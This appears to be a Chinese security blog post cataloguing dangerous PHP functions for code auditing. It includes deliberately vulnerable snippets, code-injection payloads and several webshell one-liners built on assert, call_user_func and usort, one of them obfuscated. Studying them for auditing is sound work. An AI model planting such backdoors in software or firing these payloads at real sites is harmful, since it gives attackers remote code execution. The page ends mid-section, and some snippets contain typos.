<!DOCTYPE html><html lang="zh-CN"><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description" content=""><title>PHP代码审计-弱类型 | Hao's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=undefined"><link rel="stylesheet" type="text/css" href="https://unpkg.com/normalize.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/pure-min.css"><link rel="stylesheet" type="text/css" href="https://unpkg.com/purecss/build/grids-responsive-min.css"><link rel="stylesheet" href="https://unpkg.com/font-awesome@4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="https://unpkg.com/jquery/dist/jquery.min.js"></script><link rel="icon" mask="" sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><script type="text/javascript" src="https://unpkg.com/clipboard/dist/clipboard.min.js"></script><script type="text/javascript" src="https://unpkg.com/toastr/build/toastr.min.js"></script><link rel="stylesheet" href="https://unpkg.com/toastr/build/toastr.min.css"><div class="darkmode-toggle">🌓</div><script>var prefersDarkMode = window.matchMedia('(prefers-color-scheme: dark)');
var toggle = document.querySelector('.darkmode-toggle');
var html = document.querySelector('html');

html.dataset.dark = localStorage.dark || prefersDarkMode.matches;

toggle.addEventListener('click', () => {
localStorage.dark = !(html.dataset.dark == 'true');
html.dataset.dark = localStorage.dark;
});</script><meta name="generator" content="Hexo 7.3.0"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">PHP代码审计-弱类型</h1><a id="logo" href="/.">Hao's Blog</a><p class="description"></p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> 首页</i></a><a href="/archives/"><i class="fa fa-archive"> 归档</i></a><a href="/about/"><i class="fa fa-user"> 关于</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">PHP代码审计-弱类型</h1><div class="post-meta">2025-10-13<span> | </span><span class="category"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">代码审计</a></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">文章目录</div><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#php%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0%E6%80%BB%E7%BB%93"><span class="toc-number">1.</span> <span class="toc-text">php危险函数总结</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%BB%80%E4%B9%88%E6%98%AF%E5%8D%B1%E9%99%A9%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.1.</span> <span class="toc-text">什么是危险函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%89%A7%E8%A1%8C%E4%BB%BB%E6%84%8F%E4%BB%A3%E7%A0%81%E7%9A%84%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.</span> <span class="toc-text">执行任意代码的函数</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#eval%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.1.</span> <span class="toc-text">eval函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#assert%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.2.</span> <span class="toc-text">assert函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#create-function%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.3.</span> <span class="toc-text">create_function函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#preg-replace%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.4.</span> <span class="toc-text">preg_replace函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#call-user-func-call-user-func-array%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.5.</span> <span class="toc-text">call_user_func&#x2F;call_user_func_array函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#array-map%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.6.</span> <span class="toc-text">array_map函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#array-filter%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.7.</span> <span class="toc-text">array_filter函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#usort-uasort%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.8.</span> <span class="toc-text">usort&#x2F;uasort函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#a-b%E5%8A%A8%E6%80%81%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.2.9.</span> <span class="toc-text">$a$b动态函数</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%AF%BB%E5%8F%96%E7%BD%91%E7%BB%9C%E8%B5%84%E6%BA%90%E7%9A%84%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.3.</span> <span class="toc-text">读取网络资源的函数</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Fopen"><span class="toc-number">1.0.0.3.1.</span> <span class="toc-text">Fopen()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#file-get-content"><span class="toc-number">1.0.0.3.2.</span> <span class="toc-text">file_get_content()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#curl"><span class="toc-number">1.0.0.3.3.</span> <span class="toc-text">curl</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#php%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.4.</span> <span class="toc-text">php命令执行函数</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1%EF%BC%8Csystem%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.4.1.</span> <span class="toc-text">1，system函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2%EF%BC%8Cshell-exec-%E6%B2%A1%E6%9C%89%E5%9B%9E%E6%98%BE%E7%9A%84%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C"><span class="toc-number">1.0.0.4.2.</span> <span class="toc-text">2，shell_exec(没有回显的命令执行)</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3%EF%BC%8Cpassthru%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.4.3.</span> <span class="toc-text">3，passthru函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4%EF%BC%8Cexec%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.4.4.</span> <span class="toc-text">4，exec函数</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4%EF%BC%8Cob-start%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.4.5.</span> <span class="toc-text">4，ob_start函数</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E6%96%87%E4%BB%B6%E7%9A%84%E5%87%BD%E6%95%B0"><span class="toc-number">1.0.0.5.</span> <span class="toc-text">操作文件的函数</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#Copy"><span class="toc-number">1.0.0.5.1.</span> <span class="toc-text">Copy()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#File-get-contents-File-put-contents"><span class="toc-number">1.0.0.5.2.</span> <span class="toc-text">File_get_contents()&#x2F;File_put_contents</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#File"><span class="toc-number">1.0.0.5.3.</span> <span class="toc-text">File()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Fopen-1"><span class="toc-number">1.0.0.5.4.</span> <span class="toc-text">Fopen()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Move-uploaded-file"><span class="toc-number">1.0.0.5.5.</span> <span class="toc-text">Move_uploaded_file()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Readfile"><span class="toc-number">1.0.0.5.6.</span> <span class="toc-text">Readfile()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Rename"><span class="toc-number">1.0.0.5.7.</span> <span class="toc-text">Rename()</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#Unlink"><span class="toc-number">1.0.0.5.8.</span> <span class="toc-text">Unlink()</span></a></li></ol></li></ol></li></ol></li></ol></li></ol></div></div><div class="post-content"><h1 id="php危险函数总结"><a href="#php危险函数总结" class="headerlink" title="php危险函数总结"></a>php危险函数总结</h1><h4 id="什么是危险函数"><a href="#什么是危险函数" class="headerlink" title="什么是危险函数"></a>什么是危险函数</h4><p> 函数设计出来就是让人使用的，之所以危险，是因为其功能过于强大。开发人员特别是刚从业的人员很少很少会完整阅读整个文档，再或者是没有意识到当给这些函数传递一些非常规的，外部可控的参数会带来什么影响。</p>
<h4 id="执行任意代码的函数"><a href="#执行任意代码的函数" class="headerlink" title="执行任意代码的函数"></a>执行任意代码的函数</h4><ul>
<li>eval函数</li>
<li>assert函数</li>
<li>create_function 函数</li>
<li>preg_replace 函数</li>
<li>call_user_func&#x2F;call_user_func_array函数</li>
<li>array_map函数</li>
<li>array_filter函数</li>
<li>usort&#x2F;uasort函数</li>
<li>$a($b)动态函数</li>
</ul>
<h5 id="eval函数"><a href="#eval函数" class="headerlink" title="eval函数"></a>eval函数</h5><p>eval() 函数把字符串按照 PHP 代码来计算。</p>
<p>该字符串必须是合法的 PHP 代码，且必须以分号结尾。</p>
<p>**注释：**return 语句会立即终止对字符串的计算。</p>
<p>**提示：**该函数对于在数据库文本字段中供日后计算而进行的代码存储很有用。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$string</span> = <span class="string">&quot;beautiful&quot;</span>;</span><br><span class="line"><span class="variable">$time</span> = <span class="string">&quot;winter&quot;</span>;</span><br><span class="line"><span class="variable">$str</span> = <span class="string">&#x27;This is a $string $time morning!&#x27;</span>;</span><br><span class="line"><span class="keyword">eval</span>(<span class="string">&quot;\$str = \&quot;<span class="subst">$str</span>\&quot;;&quot;</span>);</span><br><span class="line"><span class="keyword">echo</span> <span class="variable">$str</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">//输出为：This is a beautiful winter morning!</span></span><br></pre></td></tr></table></figure>

<p><strong>简单的一句话木马：</strong></p>
<h5 id="assert函数"><a href="#assert函数" class="headerlink" title="assert函数"></a>assert函数</h5><p>assert——检测一个 断言是否为FALSE</p>
<p>如果参数为字符串，它将会被assert()当做php代码来执行</p>
<p>版本只能为：5.x</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">	<span class="function"><span class="keyword">function</span> <span class="title">fo</span></span>&#123;</span><br><span class="line">	<span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;shell.php&quot;</span>, <span class="string">&quot;&lt;?php phpinfo() ?&gt;&quot;</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="literal">true</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="variable">$func</span>=<span class="variable">$_GET</span>[<span class="string">&quot;func&quot;</span>];</span><br><span class="line"><span class="title function_ invoke__">assert</span>(<span class="string">&quot;<span class="subst">$func</span>()&quot;</span>);</span><br></pre></td></tr></table></figure>

<p>如果我们提交?func&#x3D;fo，即可写入shell.php</p>
<h5 id="create-function函数"><a href="#create-function函数" class="headerlink" title="create_function函数"></a>create_function函数</h5><p>create_function(string $args, string $code)</p>
<p>适用范围：<code>PHP 4&gt; = 4.0.1</code>，<code>PHP 5</code>，<code>PHP 7</code></p>
<p>功能：根据传递的参数创建匿名函数，并为其返回唯一名称。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="variable">$str2</span>=<span class="string">&#x27;echo&#x27;</span>.<span class="variable">$a</span>.<span class="string">&#x27;&quot;test&quot;&#x27;</span>.<span class="variable">$id</span>.<span class="string">&quot;;&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$f1</span> = <span class="title function_ invoke__">create_function</span>(<span class="string">&#x27;$a&#x27;</span>, <span class="variable">$str2</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$f1</span>(<span class="string">&quot;abc&quot;</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>payload:</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="attribute">id</span>=;&#125;phpinfo();/*</span><br></pre></td></tr></table></figure>

<p><img src="https://myhaoblog.oss-cn-beijing.aliyuncs.com/ppp/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-10-13%20190816.png"></p>
<h5 id="preg-replace函数"><a href="#preg-replace函数" class="headerlink" title="preg_replace函数"></a>preg_replace函数</h5><p>执行一个正则表达式的搜索和替换,搜索 <code>subject</code> 中匹配 <code>pattern</code> 的部分，以 <code>replacement</code> 进行替换。</p>
<p>preg_replace($pattern,$replacement,$subject,$limit,$count)</p>
<p>看个例子1-双引号</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">&#123;$&#123;phpinfo()&#125;</span>&#125;&quot;</span>; <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://myhaoblog.oss-cn-beijing.aliyuncs.com/ppp/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-10-13%20191814.png"></p>
<p>单引号</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;&#123;$&#123;phpinfo()&#125;&#125;&#x27;</span>;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://myhaoblog.oss-cn-beijing.aliyuncs.com/ppp/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-10-13%20192005.png"></p>
<p><strong>为什么呢？ 在php中，双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果；单引号中的变量不会被处理。 注意：双引号中的函数不会被执行和替换。</strong></p>
<p>这其实是<a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/language.variables.variable.php">可变变量的原因</a></p>
<p>我们在看一个例子2</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/(.*)/ei&#x27;</span>, <span class="string">&#x27;strtolower(&quot;\\1&quot;)&#x27;</span>, $&#123;<span class="title function_ invoke__">phpinfo</span>()&#125;);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>特别说明： &#x2F;e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码（在适当的逆向引用替换完之后）。提示：要确保 replacement 构成一个合法的 PHP 代码字符串，否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。</p>
<p><strong>那我们知道 preg_replace 的 &#x2F;e 修正符会将 replacement 参数当作 php 代码，并且以 eval 函数的方式执行，前提是 subject 中有 pattern 的匹配。</strong></p>
<p>那么现在我来总结一下：要想漏洞产生要满足的额条件</p>
<blockquote>
<p>1.&#x2F;e修饰符必不可少<br>2.你必须让 subject 中有 pattern 的匹配。<br>3.可能跟php版本有关系<br>4.满足可变变量的条件：也就是<strong>双引号里面如果包含有变量，php解释器会将其替换为变量解释后的结果比如说 ‘strtolower(“\1”)’</strong></p>
</blockquote>
<h5 id="call-user-func-call-user-func-array函数"><a href="#call-user-func-call-user-func-array函数" class="headerlink" title="call_user_func&#x2F;call_user_func_array函数"></a>call_user_func&#x2F;call_user_func_array函数</h5><p>call_user_func($callback,$parameter)</p>
<p>调用一个回调函数处理字符串,</p>
<p>call_user_func_array($callback,$param arr)</p>
<p>利用回调函数处理数组。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;&gt;php</span><br><span class="line">    <span class="function"><span class="keyword">function</span> <span class="title">foo</span>(<span class="params"><span class="variable">$str</span>,<span class="variable">$sr2</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$str1</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="variable">$str2</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="title function_ invoke__">call_user_func</span>(<span class="string">&#x27;foo&#x27;</span>,<span class="number">1</span>,<span class="number">2</span>);</span><br><span class="line"><span class="title function_ invoke__">call_user_func_arry</span>(<span class="string">&#x27;foo&#x27;</span>,<span class="title function_ invoke__">arry</span>(<span class="number">3</span>,<span class="number">4</span>))</span><br><span class="line">    <span class="comment">//输出：1234</span></span><br></pre></td></tr></table></figure>

<p>一句话木马：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">@<span class="title function_ invoke__">call_user_func</span>(<span class="string">&quot;assert&quot;</span>,<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="array-map函数"><a href="#array-map函数" class="headerlink" title="array_map函数"></a>array_map函数</h5><p>array_map（$callback,$array1)</p>
<p> 作用是为数组的每个元素应用回调函数 。其返回值为数组，是为 array1 每个元素应用 callback函数之后的数组。 callback 函数形参的数量和传给 array_map() 数组数量，两者必须一样。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$func</span>=<span class="variable">$_GET</span>[<span class="string">&quot;func&quot;</span>];</span><br><span class="line"></span><br><span class="line"><span class="variable">$cmd</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="variable">$array</span>[<span class="number">0</span>]=<span class="variable">$cmd</span>;</span><br><span class="line"></span><br><span class="line"><span class="variable">$new_array</span>=<span class="title function_ invoke__">array_map</span>(<span class="variable">$func</span>,<span class="variable">$array</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="https://myhaoblog.oss-cn-beijing.aliyuncs.com/ppp/%E5%B1%8F%E5%B9%95%E6%88%AA%E5%9B%BE%202025-10-13%20195247.png"></p>
<h5 id="array-filter函数"><a href="#array-filter函数" class="headerlink" title="array_filter函数"></a>array_filter函数</h5><p>array_filter() 函数用回调函数过滤数组中的元素。</p>
<p>该函数把输入数组中的每个键值传给回调函数。如果回调函数返回 true，则把输入数组中的当前键值返回给结果数组。数组键名保持不变。</p>
<p>语法：array array_filter ( array $array [, callable $callback [, int $flag &#x3D; 0 ]] )</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$cmd</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="variable">$array1</span>=<span class="keyword">array</span>(<span class="variable">$cmd</span>);</span><br><span class="line"></span><br><span class="line"><span class="variable">$func</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;func&#x27;</span>];</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">array_filter</span>(<span class="variable">$array1</span>,<span class="variable">$func</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="usort-uasort函数"><a href="#usort-uasort函数" class="headerlink" title="usort&#x2F;uasort函数"></a>usort&#x2F;uasort函数</h5><p><strong>usort</strong></p>
<p>使用用户自定义的比较函数对数组中的值进行排序</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="title function_ invoke__">usort</span> ( <span class="keyword">array</span> &amp;<span class="variable">$array</span> , <span class="keyword">callable</span> <span class="variable">$value_compare_func</span> ) : <span class="keyword">bool</span></span><br></pre></td></tr></table></figure>

<p>本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序，那么应该使用此函数。</p>
<p>例子：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">cmp</span>(<span class="params"><span class="variable">$a</span>, <span class="variable">$b</span></span>)</span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$a</span> == <span class="variable">$b</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> (<span class="variable">$a</span> &lt; <span class="variable">$b</span>) ? -<span class="number">1</span> : <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="variable">$a</span> = <span class="keyword">array</span>(<span class="number">3</span>, <span class="number">2</span>, <span class="number">5</span>, <span class="number">6</span>, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">usort</span>(<span class="variable">$a</span>, <span class="string">&quot;cmp&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">foreach</span> (<span class="variable">$a</span> <span class="keyword">as</span> <span class="variable">$key</span> =&gt; <span class="variable">$value</span>) &#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;<span class="subst">$key</span>: <span class="subst">$value</span>\n&quot;</span>;</span><br><span class="line">    <span class="comment">//&quot;&lt;br/&gt;&quot;浏览器显示换行，源代码显示&lt;br/&gt;</span></span><br><span class="line">    <span class="comment">//&quot;\n&quot;浏览器不显示换行，源代码显示换行</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>结果：0: 1 1: 2 2: 3 3: 5 4: 6</p>
<p>…运算符,三个点，该运算符可以将数组(必须是索引数组)或者可遍历的对象展开变为参数</p>
<p>编写一句话<br>先放出最终的代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">usort</span>(...<span class="variable">$_GET</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>那么$_GET变量中的值,应该是</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[[<span class="string">&#x27;$a=0&#x27;</span>,<span class="string">&#x27;eval($_POST[&quot;x&quot;])&#x27;</span>],<span class="string">&#x27;assert&#x27;</span>];</span><br></pre></td></tr></table></figure>

<p>$_GET[0]是usort的第一个参数</p>
<p>$_GET[1]是usort的回调函数名</p>
<p>也就相当于</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">usort</span>([<span class="string">&#x27;$a=0&#x27;</span>,<span class="string">&#x27;eval($_POST[&quot;x&quot;])&#x27;</span>],<span class="string">&#x27;assert&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>


<p>最终利用是这样的</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?<span class="number">1</span>[]=<span class="number">0</span>&amp;<span class="number">1</span>[]=<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;x&#x27;</span>])&amp;<span class="number">2</span>=assert</span><br></pre></td></tr></table></figure>


<p>上面的一句话,只能在php环境&gt;&#x3D;5.6才能用</p>
<p>于是更新下,环境&gt;&#x3D;&lt;5.6都可以的一句话</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span> <span class="title function_ invoke__">usort</span>(<span class="variable">$_GET</span>,<span class="string">&#x27;asse&#x27;</span>.<span class="string">&#x27;rt&#x27;</span>);<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><strong>uasort()</strong></p>
<p>uasort — 使用用户自定义的比较函数对数组中的值进行排序并保持索引关联</p>
<p>官方示例：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="comment">// Comparison function</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">cmp</span>(<span class="params"><span class="variable">$a</span>, <span class="variable">$b</span></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$a</span> == <span class="variable">$b</span>) &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> (<span class="variable">$a</span> &lt; <span class="variable">$b</span>) ? -<span class="number">1</span> : <span class="number">1</span>;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// Array to be sorted</span></span><br><span class="line"><span class="variable">$array</span> = <span class="keyword">array</span>(<span class="string">&#x27;a&#x27;</span> =&gt; <span class="number">4</span>, <span class="string">&#x27;b&#x27;</span> =&gt; <span class="number">8</span>, <span class="string">&#x27;c&#x27;</span> =&gt; -<span class="number">1</span>, <span class="string">&#x27;d&#x27;</span> =&gt; -<span class="number">9</span>, <span class="string">&#x27;e&#x27;</span> =&gt; <span class="number">2</span>, <span class="string">&#x27;f&#x27;</span> =&gt; <span class="number">5</span>, <span class="string">&#x27;g&#x27;</span> =&gt; <span class="number">3</span>, <span class="string">&#x27;h&#x27;</span> =&gt; -<span class="number">4</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$array</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// Sort and print the resulting array</span></span><br><span class="line"><span class="title function_ invoke__">uasort</span>(<span class="variable">$array</span>, <span class="string">&#x27;cmp&#x27;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$array</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>执行结果：</p>
